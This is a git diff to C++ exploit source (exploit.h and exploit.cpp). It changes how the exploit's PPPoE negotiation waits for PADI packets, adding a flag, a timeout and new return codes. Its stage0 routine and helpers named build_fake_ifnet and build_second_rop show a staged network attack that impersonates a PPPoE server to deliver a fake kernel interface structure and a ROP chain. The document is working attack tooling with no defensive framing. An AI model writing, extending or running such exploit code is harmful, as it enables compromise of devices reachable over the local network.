diff --git a/include/exploit.h b/include/exploit.h index fa38ffc..1c56287 100644 --- a/include/exploit.h +++ b/include/exploit.h @@ -100,7 +100,7 @@ class Exploit { int ipcp_negotiation() const; int ppp_negotiation(const std::function(Exploit *)> &cb = nullptr, - bool ignore_initial_req = false); + bool ignore_initial_req = false, bool always_wait_padi = false); void ppp_byebye(); diff --git a/src/exploit.cpp b/src/exploit.cpp index eb16c23..78e460f 100644 --- a/src/exploit.cpp +++ b/src/exploit.cpp @@ -330,13 +330,14 @@ int Exploit::ipcp_negotiation() const { return RETURN_SUCCESS; } -int Exploit::ppp_negotiation(const std::function(Exploit *)> &cb, bool ignore_initial_req) { +int Exploit::ppp_negotiation(const std::function(Exploit *)> &cb, bool ignore_initial_req, + bool always_wait_padi) { int padi_count = ignore_initial_req ? 2 : 1; Cookie pkt; while (padi_count--) { std::cout << "[*] Waiting for PADI..." << std::endl; - dev->startCaptureBlockingMode( + if (dev->startCaptureBlockingMode( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet, pcpp::PPPoEDiscovery); auto *layer = PacketBuilder::getPPPoEDiscoveryLayer(parsedPacket, @@ -344,9 +345,12 @@ int Exploit::ppp_negotiation(const std::function(Exploit *) if (!layer) return false; ((Cookie *) cookie)->packet = parsedPacket; return true; - }, &pkt, 0); + }, &pkt, always_wait_padi ? 0 : this->timeout) != 1) { + return RETURN_FAIL; + } else if (!running) { + return RETURN_STOP; + } } - CHECK_RUNNING(); auto *pppoeDiscoveryLayer = pkt.packet.getLayerOfType(); if (!pppoeDiscoveryLayer) { @@ -695,7 +699,7 @@ std::vector Exploit::build_second_rop(Exploit *self) { } int Exploit::stage0() { - CHECK_RET(this->ppp_negotiation(Exploit::build_fake_ifnet, this->wait_padi)); + CHECK_RET(this->ppp_negotiation(Exploit::build_fake_ifnet, this->wait_padi, true)); CHECK_RET(this->lcp_negotiation()); CHECK_RET(this->ipcp_negotiation());